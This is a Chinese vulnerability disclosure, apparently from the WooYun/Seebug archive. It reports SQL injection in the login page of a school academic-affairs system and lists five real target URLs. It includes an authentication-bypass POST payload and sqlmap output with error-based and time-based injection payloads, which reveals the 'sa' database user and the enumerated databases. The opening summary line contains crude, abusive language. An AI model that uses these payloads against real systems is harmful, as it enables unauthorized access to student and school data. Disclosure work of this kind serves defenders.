### 简要描述:
男:问世间情为何物,只...女:一个大嘴巴子打上去,啪!去你妈逼的程序员还想找女朋友,活该死在代码上.
### 详细说明:
应乌云要求,五个案例!
```
http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp
http://221.232.159.24/dhjw/jwxs/login.asp
http://jiaowu.hustwenhua.net/jwxs/login.asp
http://xscx.cmcedu.cn/jwxs/login.asp
http://jwxt.hycgy.com:5000/jwxs/login.asp
```
登录的时候抓包
[<img src="https://images.seebug.org/upload/201503/23134131b0f9417332aaf2facd5751138e58292a.png" alt="QQ截图20150323134521.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/23134131b0f9417332aaf2facd5751138e58292a.png)
[<img src="https://images.seebug.org/upload/201503/231341522349117bd2b5164406c21be381e89242.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/231341522349117bd2b5164406c21be381e89242.png)
```
POST /dhjw/jwxs/login.asp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://221.232.159.24/dhjw/jwxs/login.asp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 221.232.159.24
Content-Length: 108
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: LoginLb=; ASPSESSIONIDCSACRCTD=MMHJDOJDHFEIOOCPPELOLJME
datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
```
[<img src="https://images.seebug.org/upload/201503/23134257049f1fe51cb24b085eb4a35f8897616e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/23134257049f1fe51cb24b085eb4a35f8897616e.png)
[<img src="https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png" alt="123.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png)
```
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: Account
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-2532' OR 7256=CONVER
T(INT,(SELECT CHAR(113) CHAR(106) CHAR(112) CHAR(122) CHAR(113) (SELECT (CASE WH
EN (7256=7256) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(118) C
HAR(113) CHAR(113))) AND 'ogOj'='ogOj&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-4128' OR 4975=(SELEC
T COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS s
ys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'QvyA'='QvyA&Passwor
d=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
---
[13:47:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[13:47:47] [INFO] fetching current user
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] Y
[13:47:49] [INFO] retrieved: sa
current user: 'sa'
[13:47:49] [INFO] fetching current database
[13:47:49] [INFO] retrieved: dhjw
current database: 'dhjw'
[13:47:49] [INFO] fetching database names
[13:47:49] [WARNING] reflective value(s) found and filtering out
[13:47:49] [WARNING] the SQL query provided does not return any output
[13:47:49] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[13:47:49] [INFO] fetching number of databases
[13:47:49] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[13:47:51] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[13:47:52] [ERROR] unable to retrieve the number of databases
[13:47:52] [INFO] retrieved: dhjw
[13:47:52] [INFO] retrieved: master
[13:47:52] [INFO] retrieved: tempdb
[13:47:53] [INFO] retrieved: model
[13:47:53] [INFO] retrieved: msdb
[13:47:53] [INFO] retrieved: ReportServer
[13:47:53] [INFO] retrieved: ReportServerTempDB
[13:47:53] [INFO] retrieved: dhjw
[13:47:54] [INFO] retrieved:
available databases [7]:
[*] dhjw
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[13:47:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 23 times
[13:47:54] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\221.232.159.24'
[*] shutting down at 13:47:54
```
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png" alt="123.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png)
京公网安备 11010502034610号
暂无评论